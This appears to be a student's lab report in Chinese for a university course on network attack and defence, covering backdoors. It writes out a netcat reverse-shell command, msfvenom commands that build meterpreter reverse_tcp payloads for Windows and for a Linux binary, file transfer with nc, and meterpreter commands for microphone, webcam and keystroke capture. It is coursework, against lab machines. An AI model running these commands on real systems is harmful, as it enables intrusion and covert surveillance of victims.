20202421 2022-2023-2 《网络与系统攻防技术》实验二实验报告

Menethilii 2023-06-08 12:03:12

1.实验内容

1.1实验目标

(1)使用netcat获取主机操作Shell,cron启动某项任务

(2)使用socat获取主机操作Shell, 任务计划启动

(3)使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

(4)使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

(5)使用MSF生成shellcode,注入到实践1中的pwn2427中,获取反弹连接Shell。

1.2实验要求

掌握后门原理及免杀技术
回答问题

(1)例举你能想到的一个后门进入到你系统中的可能方式?

通过钓鱼邮件附带链接诱使用户安装随后伪装成正常程序进程。

(2)例举你知道的后门如何启动起来(win及linux)的方式?

以具有跟源文件一样时戳的特洛伊木马程序版本来代替二进制程序启动。

3)Meterpreter有哪些给你映像深刻的功能?

反向连接,获得麦克风、击键记录等权限。

(4)如何发现自己有系统有没有被安装后门?
使用杀毒软件等进行查杀,自行进行netstat命令检查。

2.实验流程

2.1.1使用netcat获取主机操作Shell

查看主机和虚拟机ip地址

 

在windows下的cmd使用命令监听端口 nc -l -p 9000

在linux控制台建立连接并获得shell nc 192.168.56.1 9000 -e /bin/sh

2.1.2cron启动任务、计划启动

进入root目录随后使用cron定时设置任务

在windows计算机管理界面创建任务并设置间隔

 

2.3使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

生成:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.47.136 LPORT=9000 -f exe > backdoor123.exe 

传输:nc -l -p 9000 > backdoor123

nc 192.168.3.27 9000 < backdoor123

2.4使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

 

record_mic 麦克风记录

webcam_snap 获取摄像头权限

keyscan_start 击键过程

keyscan_dum击键记录

2.5使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=2416 -x /home/kali/Desktop/pwn20202421 -f elf > pwn20202421_1

3.问题及解决方案

以前使用过的虚拟机以及其他软件的ip混在一起导致ip反复填写错误

解决方法:清除一些注册表之后找对ip随后进行正确连接。

许多命令没有权限运行

解决方法:对比资料询问同学复刻每一步操作解决。

4.学习感悟、思考

本次实验的综合性较强,内容核心是获取shell后进行操作,只要获取了shell,通过nc传输后门程序后,由于后门程序相对较难被发现,进行的许多提取隐私的操作也很难被发现。在网络攻防之中,严防后门程序,多定期进行检查是必须的。

...全文
120 回复 打赏 收藏 转发到动态 举报
AI 作业
写回复
用AI写文章
回复
切换为时间正序
请发表友善的回复…
发表回复

93

社区成员

发帖
与我相关
我的任务
社区描述
网络与系统攻防技术课程作业
网络安全系统安全 高校
社区管理员
  • blackwall0321
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧